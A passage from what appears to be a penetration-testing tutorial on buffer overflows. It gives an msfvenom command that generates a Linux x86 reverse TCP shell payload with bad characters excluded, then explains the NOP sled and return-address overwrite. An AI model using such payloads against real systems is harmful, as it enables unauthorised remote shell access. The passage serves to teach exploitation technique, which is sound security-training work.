Generating shellcode with msfvenom

Now that we know what characters break our shellcode, we can issue our msfvenom command to grab a payload, as follows:

# msfvenom --payload linux/x86/shell/reverse_tcp LHOST= LPORT=45678 --format py --bad-chars 'x00x09x20x0axff' 

What you do with the output is up to you. You could dump it into a Python script that you'd call as an argument when you run the vulnerable program. In the following example, we've dumped it straight into a single command for ease:

Here we see a proof-of-concept: all of that gunk is sanitized payload with the return memory overwrite concatenated at the end. This proves that the code didn't break because you can see the segmentation fault Cannot access memory at the defined location. If the code actually works and we point the memory address at a location that takes the flow to the top of the shellcode, then we're golden. There's just one trick left, however, and that's pointing at the exact point in memory where the shellcode lies, which is about as tough as it sounds. Did you notice the padding at the front of the shellcode? It is 150 bytes of x90; unlike the letter z, that is not arbitrary.

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